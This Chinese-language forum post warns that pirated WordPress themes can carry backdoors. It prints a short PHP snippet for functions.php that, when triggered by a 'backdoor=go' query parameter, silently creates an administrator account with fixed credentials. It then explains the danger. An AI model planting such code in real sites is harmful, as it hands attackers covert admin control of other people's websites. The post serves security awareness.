WordPress盗版主题暗藏后门
前言俗话说的好天下没有免费的午餐,你要相信没有人傻到做亏本生意,都是会有目的性的。最近我在网上看到一篇文章,写了WordPress的暗藏后门,觉得很有一说,所以就发一下让更多的WP友友们看到,不要轻易随便乱使用模板。后门代码
[*]add_action(‘wp_head’, ‘holeinthewall’);
[*]function holeinthewall() {
[*]If ($_GET[‘backdoor == ‘go’) {
[*]require(‘wp-includes/registration.php’);
[*]If (!username_exists(‘username’)) {
[*]$user_id = wp_create_user(‘username’, ‘password’);
[*]$user = new WP_User($user_id);
[*]$user->set_role(‘administrator’);
[*]}}}
由以上的代码我们可以看出,如果把这段代码插入到你的主题函数文件functions.php中的话,然后就会自动创建一个用户名为username,密码为password的有管理员权限的账户,然后恶意人员就可以登录到你的网站后台,后果你可以自己想象一下。所以憧憬博主在这里建议大家不要随便乱使用WordPress的盗版主题,支持正版,抵制盗版,尊重开发者的劳动成果。
页:
[1]